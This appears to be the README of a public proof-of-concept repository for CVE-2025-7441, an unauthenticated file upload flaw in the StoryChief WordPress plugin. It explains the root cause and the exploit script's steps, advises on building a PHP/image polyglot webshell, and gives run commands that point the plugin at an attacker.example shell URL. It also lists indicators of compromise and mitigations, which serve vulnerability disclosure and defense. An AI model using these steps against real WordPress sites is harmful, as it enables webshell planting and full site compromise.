来源

关联漏洞

描述

StoryChief <= 1.0.42 - Unauthenticated Arbitrary File Upload

介绍

# CVE-2025-7441
StoryChief <= 1.0.42 - Unauthenticated Arbitrary File Upload
# 🚨 StoryChief <= 1.0.42 — Unauthenticated Arbitrary File Upload (CVE-2025-7441)

## ℹ️ Summary
StoryChief (WordPress plugin) versions up to and including 1.0.42 expose a critical unauthenticated arbitrary file upload vulnerability via the REST endpoint /wp-json/storychief/webhook. An attacker can cause the plugin to fetch and persist an attacker-controlled remote resource (for example, a webshell) into the site's uploads directory, enabling remote code execution in many default WordPress deployments.

- CVE: CVE-2025-7441  
- CVSS: 9.8 (Critical)

---

## 💥 Impact
- Remote unauthenticated file upload to wp-content/uploads/YYYY/MM/<filename>.  
- Potential for remote code execution when the uploaded file is executable (e.g., PHP).  
- Full site compromise is possible when WordPress is configured to execute uploaded PHP under the document root.

---

## 🧩 Vulnerability Root Cause
The plugin accepts an incoming JSON payload (publish event) that contains a featured_image -> data -> sizes -> full field pointing to an arbitrary URL. StoryChief does not perform sufficient filetype/content validation or restrict the URL source, allowing the plugin to fetch the remote resource and save it under the site's uploads directory. There is insufficient validation to prevent storing files that contain executable code.

---

## 🛠️ Exploit script — what it does (mapping to the vulnerability)
This section explains the exploit script (provided separately) at a high level and maps each important behavior to the underlying vulnerability. 

- CLI argument parsing — target URL (-u/--url), remote shell URL (-shell), optional HMAC key, headers, proxy/timeout/retry flags, debug and print-only options.
- Target normalization — appends /wp-json/storychief/webhook when a site root is supplied.
- Shell URL validation — verifies the remote URL is reachable (HEAD/GET or curl).
- Filename extraction — uses the remote URL basename to infer the final uploads filename.
- Payload construction — places the attacker-controlled URL into data.featured_image.data.sizes.full to force the plugin to fetch and store the file.
- HMAC signing (optional) — computes meta.mac (HMAC-SHA256) using an optional hex key; some servers may ignore or require this.
- Delivery — uses requests with retries/backoff or curl fallback, supports custom headers, proxies, and --no-verify.
- Response handling — parses JSON responses for permalink/id keys to detect success; otherwise reports failure.
- Output — prints the expected uploads path: wp-content/uploads/YYYY/MM/<filename> on success.

---

## 🖼️ Shell file requirements (critical)
When using a .php remote file (for example: https://attacker.example/shell.php) the file must include a valid image header (magic bytes) so it will be treated/accepted as an image by the plugin or image-processing code. Key points:

- Use a polyglot approach: the file should begin with valid image magic bytes (e.g., JPEG, PNG, or GIF) so naive checks and image handlers accept it, while also containing the PHP payload in a section that remains on disk verbatim.
- Common image magic bytes:
  - JPEG: 0xFF 0xD8 0xFF
  - PNG: 0x89 0x50 0x4E 0x47
  - GIF: ASCII "GIF89a" or "GIF87a"
- Do not rely solely on filename/extension. Many plugins inspect file contents or use libraries (GD, ImageMagick) that verify image integrity.
- Environment-dependent: some servers will further validate or re-encode images, which may strip injected code. Test in an authorized lab first.
- Ethical reminder: do NOT publish working webshell code here. Create and test such files only in authorized environments.

---

## ▶️ How to run (examples)
Replace placeholders with authorized targets. All examples below use a .php remote shell URL.

- Basic example:
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php
```

- With explicit webhook path and debug:
```bash
python3 CVE-2025-7441.py -u https://target.example/wp-json/storychief/webhook -shell https://attacker.example/shell.php --debug
```

- Use curl instead of requests:
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --use-curl
```

- Print payload only (do not send):
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --print-only
```

Important flags:
- --no-verify: skip TLS verification (use with caution).
- --proxy: route requests through a proxy.
- --header "Key: Value": add custom headers.

---

## 📤 Expected outputs
- Successful run:
  - Uploaded: wp-content/uploads/2025/10/shell.php
- Debug examples:
  - [DEBUG] shell HEAD status: 200
  - [DEBUG] post status: 200
  - [DEBUG] curl cmd: curl -s -X POST https://target... -H Content-Type: application/json -d '{"meta":...}'
- Failure messages:
  - "[-] Error: shell URL is not reachable (not HTTP 200)"
  - "[-] Error: request failed"
  - "[-] Error: upload failed or endpoint returned non-JSON/HTML"

---

## 🔎 Detection & Indicators of Compromise (IoC)
- Unexpected POST requests to /wp-json/storychief/webhook from unknown IPs.
- New files in wp-content/uploads/<YYYY>/<MM>/ with PHP extensions or image extensions containing embedded code.
- Webserver logs showing outbound GETs to attacker-controlled domains followed by access to uploaded files.
- Suspicious image files with appended or embedded non-image content.

---

## 🛡️ Mitigation & Remediation
Short term:
- Upgrade StoryChief to a patched version immediately when available.
- Block or restrict /wp-json/storychief/webhook via WAF or server rules.
- Restrict server outbound fetches or egress to untrusted domains.

Developer guidance:
- Validate file types and contents after any remote fetch; verify images using safe parsers and reject invalid files.
- Require authentication for webhooks that cause server-side downloads or file creation.
- Ensure HMAC/signature verification is implemented and enforced.
- Store uploaded content outside the webroot or disable execution of uploaded files in wp-content/uploads (web server rules).

---

## ⚠️ Limitations & Caveats
- Exploit success depends on server configuration, image-processing libraries, and webserver execution policies.
- Servers that reprocess or re-encode images may remove injected payloads.
- If the plugin verifies signatures, supplying an incorrect mac may cause rejection.

---

## 🤝 Responsible Use
This document is for defenders and authorized testers. Do NOT use these techniques against systems you do not own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.

If you are reporting the issue to a vendor or site owner, include reproduction details, safe remediation steps, and suggested fixes.

---

## 📚 References & Credits
- Report and exploit script by: Nxploited (Khaled Alenazi) — script filename: CVE-2025-7441.py (provided separately)
- CVE: CVE-2025-7441
- CVSS: 9.8

文件快照

 [4.0K]  /data/pocs/c0b65e708f5f3b21829b49111648d47de964d8f5
├── [9.4K]  CVE-2025-7441.py
├── [1.5K]  LICENSE
├── [6.9K]  README.md
└── [  53]  requirements.txt

0 directories, 4 files

备注